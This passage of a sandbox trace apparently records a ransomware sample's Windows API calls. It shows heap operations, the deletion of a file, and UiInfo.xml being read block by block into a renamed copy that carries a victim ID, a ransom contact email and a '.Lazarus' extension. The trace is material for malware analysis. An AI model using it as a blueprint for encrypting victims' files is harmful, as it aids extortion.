hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0073.560] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0073.560] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6f0 | out: hHeap=0x20000) returned 1 [0073.560] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0073.560] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69e30 | out: hHeap=0x20000) returned 1 [0073.561] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8e440 | out: hHeap=0x20000) returned 1 [0073.561] CloseHandle (hObject=0x420) returned 1 [0073.565] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d438 | out: hHeap=0x20000) returned 1 [0073.565] CloseHandle (hObject=0x418) returned 1 [0073.565] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0073.565] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0073.565] AreFileApisANSI () returned 1 [0073.565] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 47 [0073.565] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71620 [0073.565] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dee0, cbMultiByte=-1, lpWideCharStr=0x71620, cchWideChar=47 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml") returned 47 [0073.565] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml" (normalized: "c:\\588bce7c90097ed212\\client\\parameterinfo.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0073.567] GetFileType (hFile=0x418) returned 0x1 [0073.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0073.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8d438 [0073.568] GetLastError () returned 0xb7 [0073.568] SetLastError (dwErrCode=0xb7) [0073.568] WriteFile (in: hFile=0x418, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0073.569] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d438 | out: hHeap=0x20000) returned 1 [0073.569] CloseHandle (hObject=0x418) returned 1 [0073.569] AreFileApisANSI () returned 1 [0073.569] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 47 [0073.569] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71ca0 [0073.569] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dee0, cbMultiByte=-1, lpWideCharStr=0x71ca0, cchWideChar=47 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml") returned 47 [0073.569] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml" (normalized: "c:\\588bce7c90097ed212\\client\\parameterinfo.xml")) returned 1 [0073.570] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0073.570] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0073.570] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0073.570] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0073.570] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0073.570] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0073.570] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0073.570] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8abb8 | out: hHeap=0x20000) returned 1 [0073.570] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d7b0 | out: hHeap=0x20000) returned 1 [0073.570] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d618 | out: hHeap=0x20000) returned 1 [0073.570] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85fc0 | out: hHeap=0x20000) returned 1 [0073.570] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b8b0 | out: hHeap=0x20000) returned 1 [0073.570] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0073.570] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0073.570] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0073.570] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0073.570] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0073.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0073.571] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.571] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.571] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x79a6a00, ftCreationTime.dwHighDateTime=0x1ca5de3, ftLastAccessTime.dwLowDateTime=0x79a6a00, ftLastAccessTime.dwHighDateTime=0x1ca5de3, ftLastWriteTime.dwLowDateTime=0x79a6a00, ftLastWriteTime.dwHighDateTime=0x1ca5de3, nFileSizeHigh=0x0, nFileSizeLow=0x9882, dwReserved0=0x1, dwReserved1=0x0, cFileName="UiInfo.xml", cAlternateFileName="")) returned 1 [0073.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0073.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0073.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0073.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0073.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0073.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0073.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0073.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0073.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0073.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0073.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0073.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0073.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0073.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0073.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0073.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0073.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0073.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0073.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0073.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71960 [0073.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0073.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0073.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0073.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0073.571] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.571] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.571] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.571] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0073.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0073.571] AreFileApisANSI () returned 1 [0073.572] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\Client\\UiInfo.xml", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\Client\\UiInfo.xml", lpUsedDefaultChar=0x0) returned 40 [0073.572] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0073.572] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.572] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.572] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0073.572] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0073.572] AreFileApisANSI () returned 1 [0073.572] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4ddc8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 40 [0073.572] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0073.572] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4ddc8, cbMultiByte=-1, lpWideCharStr=0x6d478, cchWideChar=40 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Client\\UiInfo.xml") returned 40 [0073.572] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Client\\UiInfo.xml" (normalized: "c:\\588bce7c90097ed212\\client\\uiinfo.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0073.572] GetFileType (hFile=0x418) returned 0x1 [0073.572] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0073.572] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0073.573] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0073.573] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0073.573] CloseHandle (hObject=0x418) returned 1 [0073.680] AreFileApisANSI () returned 1 [0073.680] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4ddc8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 40 [0073.680] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d160 [0073.680] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4ddc8, cbMultiByte=-1, lpWideCharStr=0x6d160, cchWideChar=40 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Client\\UiInfo.xml") returned 40 [0073.680] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Client\\UiInfo.xml" (normalized: "c:\\588bce7c90097ed212\\client\\uiinfo.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x40c [0073.680] GetFileType (hFile=0x40c) returned 0x1 [0073.680] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d160 | out: hHeap=0x20000) returned 1 [0073.680] CloseHandle (hObject=0x40c) returned 1 [0073.680] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0073.680] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0073.681] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0073.681] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0073.681] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0073.681] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0073.681] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0073.681] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0073.681] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0073.681] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0073.681] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0073.681] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0073.681] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0073.681] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0073.681] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0073.681] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0073.681] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0073.681] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0073.681] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0073.681] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0073.681] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0073.681] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0073.681] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0073.681] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0073.681] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0073.681] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0073.681] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0073.681] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0073.681] AreFileApisANSI () returned 1 [0073.681] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4ddc8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 40 [0073.681] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cfa8 [0073.681] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4ddc8, cbMultiByte=-1, lpWideCharStr=0x6cfa8, cchWideChar=40 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Client\\UiInfo.xml") returned 40 [0073.681] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\Client\\UiInfo.xml" (normalized: "c:\\588bce7c90097ed212\\client\\uiinfo.xml"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x79a6a00, ftCreationTime.dwHighDateTime=0x1ca5de3, ftLastAccessTime.dwLowDateTime=0x79a6a00, ftLastAccessTime.dwHighDateTime=0x1ca5de3, ftLastWriteTime.dwLowDateTime=0x79a6a00, ftLastWriteTime.dwHighDateTime=0x1ca5de3, nFileSizeHigh=0x0, nFileSizeLow=0x9882)) returned 1 [0073.681] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cfa8 | out: hHeap=0x20000) returned 1 [0073.681] AreFileApisANSI () returned 1 [0073.682] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0073.682] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0073.682] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0073.682] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0073.682] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0073.682] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0073.682] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0073.682] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0073.682] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0073.682] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0073.682] GetLastError () returned 0x0 [0073.682] SetLastError (dwErrCode=0x0) [0073.682] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e260 [0073.682] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x85fc0 [0073.682] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b8b0 [0073.682] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d5a0 [0073.682] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d738 [0073.682] GetLastError () returned 0x0 [0073.682] SetLastError (dwErrCode=0x0) [0073.682] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0073.682] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0073.682] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x47) returned 0x68d60 [0073.682] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0073.682] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75d50 [0073.682] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0073.682] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cce0 [0073.682] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0073.682] AreFileApisANSI () returned 1 [0073.683] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75d50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 102 [0073.683] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xcc) returned 0x74868 [0073.683] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75d50, cbMultiByte=-1, lpWideCharStr=0x74868, cchWideChar=102 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Client\\UiInfo.xml.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 102 [0073.683] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Client\\UiInfo.xml.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\client\\uiinfo.xml.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x40c [0073.683] GetFileType (hFile=0x40c) returned 0x1 [0073.683] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x74868 | out: hHeap=0x20000) returned 1 [0073.683] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0073.683] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0073.683] AreFileApisANSI () returned 1 [0073.683] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 40 [0073.683] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0073.683] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x6d478, cchWideChar=40 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Client\\UiInfo.xml") returned 40 [0073.683] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Client\\UiInfo.xml" (normalized: "c:\\588bce7c90097ed212\\client\\uiinfo.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0073.684] GetFileType (hFile=0x410) returned 0x1 [0073.684] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0073.684] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a430 [0073.684] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0073.684] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f5c8 [0073.684] GetLastError () returned 0x0 [0073.684] SetLastError (dwErrCode=0x0) [0073.684] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f5c8 | out: hHeap=0x20000) returned 1 [0073.684] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f5c8 [0073.684] GetLastError () returned 0x0 [0073.684] SetLastError (dwErrCode=0x0) [0073.684] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f5c8 | out: hHeap=0x20000) returned 1 [0073.684] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f5c8 [0073.684] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0073.684] ReadFile (in: hFile=0x410, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0073.686] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0073.686] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d768 [0073.686] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8d438 [0073.686] GetLastError () returned 0x0 [0073.687] SetLastError (dwErrCode=0x0) [0073.688] GetLastError () returned 0x0 [0073.688] SetLastError (dwErrCode=0x0) [0073.689] GetLastError () returned 0x0 [0073.689] SetLastError (dwErrCode=0x0) [0073.689] GetLastError () returned 0x0 [0073.689] SetLastError (dwErrCode=0x0) [0073.689] ReadFile (in: hFile=0x410, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0073.689] WriteFile (in: hFile=0x40c, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.690] GetLastError () returned 0x0 [0073.690] SetLastError (dwErrCode=0x0) [0073.690] GetLastError () returned 0x0 [0073.690] SetLastError (dwErrCode=0x0) [0073.690] GetLastError () returned 0x0 [0073.690] SetLastError (dwErrCode=0x0) [0073.690] GetLastError () returned 0x0 [0073.690] SetLastError (dwErrCode=0x0) [0073.691] ReadFile (in: hFile=0x410, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0073.691] WriteFile (in: hFile=0x40c, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.691] GetLastError () returned 0x0 [0073.691] SetLastError (dwErrCode=0x0) [0073.691] GetLastError () returned 0x0 [0073.691] SetLastError (dwErrCode=0x0) [0073.691] GetLastError () returned 0x0 [0073.691] SetLastError (dwErrCode=0x0) [0073.691] GetLastError () returned 0x0 [0073.691] SetLastError (dwErrCode=0x0) [0073.691] ReadFile (in: hFile=0x410, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0073.692] WriteFile (in: hFile=0x40c, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: 